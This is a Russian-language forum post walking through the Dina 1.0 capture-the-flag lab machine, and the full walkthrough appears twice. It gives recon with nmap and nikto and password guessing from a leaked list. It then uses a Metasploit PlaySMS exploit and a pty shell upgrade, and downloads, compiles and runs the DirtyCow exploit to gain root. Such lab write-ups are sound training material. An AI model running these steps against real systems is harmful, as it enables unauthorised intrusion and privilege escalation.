Vander
28.05.2018, 16:41
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060 (https://forum.antichat.xyz/members/2588096/), буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.
Взяли несложную Dina 1.0.
https://forum.antichat.xyz/attachments/28988895/1527510758133.png
Для начала, как обычно немного разведки:
Код:
netdiscover
https://forum.antichat.xyz/attachments/28988895/1527510802301.png
Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Код:
nmap –sV –A 192.168.0.107
https://forum.antichat.xyz/attachments/28988895/1527510852600.png
Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
https://forum.antichat.xyz/attachments/28988895/1527510867065.png
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Код:
nikto –h 192.168.0.107
https://forum.antichat.xyz/attachments/28988895/1527510900817.png
Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
https://forum.antichat.xyz/attachments/28988895/1527510914002.png
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
https://forum.antichat.xyz/attachments/28988895/1527510926310.png
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
Код:
msfconsole
search playsms
https://forum.antichat.xyz/attachments/28988895/1527510977810.png
По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
https://forum.antichat.xyz/attachments/28988895/1527510991006.png
Запускаем:
Код:
exploit
https://forum.antichat.xyz/attachments/28988895/1527511014802.png
Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
https://forum.antichat.xyz/attachments/28988895/1527511039160.png
Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
https://forum.antichat.xyz/attachments/28988895/1527511063758.png
Переименуем и скомпилируем:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
https://forum.antichat.xyz/attachments/28988895/1527511085544.png
Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Код:
./dirthy
https://forum.antichat.xyz/attachments/28988895/1527511116547.png
Переподключаемся к шеллу и меняем пользователя на firefart:
Код:
su
https://forum.antichat.xyz/attachments/28988895/1527511155492.png
Теперь осталось взять флаг:
Код:
cd /root
cat flag.txt
https://forum.antichat.xyz/attachments/28988895/1527511204493.png
На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)
https://forum.antichat.xyz/attachments/28988895/1527511220878.png
Взяли несложную Dina 1.0.
https://forum.antichat.xyz/attachments/28988895/1527510758133.png
Для начала, как обычно немного разведки:
Код:
netdiscover
https://forum.antichat.xyz/attachments/28988895/1527510802301.png
Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Код:
nmap –sV –A 192.168.0.107
https://forum.antichat.xyz/attachments/28988895/1527510852600.png
Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
https://forum.antichat.xyz/attachments/28988895/1527510867065.png
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Код:
nikto –h 192.168.0.107
https://forum.antichat.xyz/attachments/28988895/1527510900817.png
Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
https://forum.antichat.xyz/attachments/28988895/1527510914002.png
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
https://forum.antichat.xyz/attachments/28988895/1527510926310.png
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
Код:
msfconsole
search playsms
https://forum.antichat.xyz/attachments/28988895/1527510977810.png
По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
https://forum.antichat.xyz/attachments/28988895/1527510991006.png
Запускаем:
Код:
exploit
https://forum.antichat.xyz/attachments/28988895/1527511014802.png
Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
https://forum.antichat.xyz/attachments/28988895/1527511039160.png
Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
https://forum.antichat.xyz/attachments/28988895/1527511063758.png
Переименуем и скомпилируем:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
https://forum.antichat.xyz/attachments/28988895/1527511085544.png
Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Код:
./dirthy
https://forum.antichat.xyz/attachments/28988895/1527511116547.png
Переподключаемся к шеллу и меняем пользователя на firefart:
Код:
su
https://forum.antichat.xyz/attachments/28988895/1527511155492.png
Теперь осталось взять флаг:
Код:
cd /root
cat flag.txt
https://forum.antichat.xyz/attachments/28988895/1527511204493.png
На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)
https://forum.antichat.xyz/attachments/28988895/1527511220878.png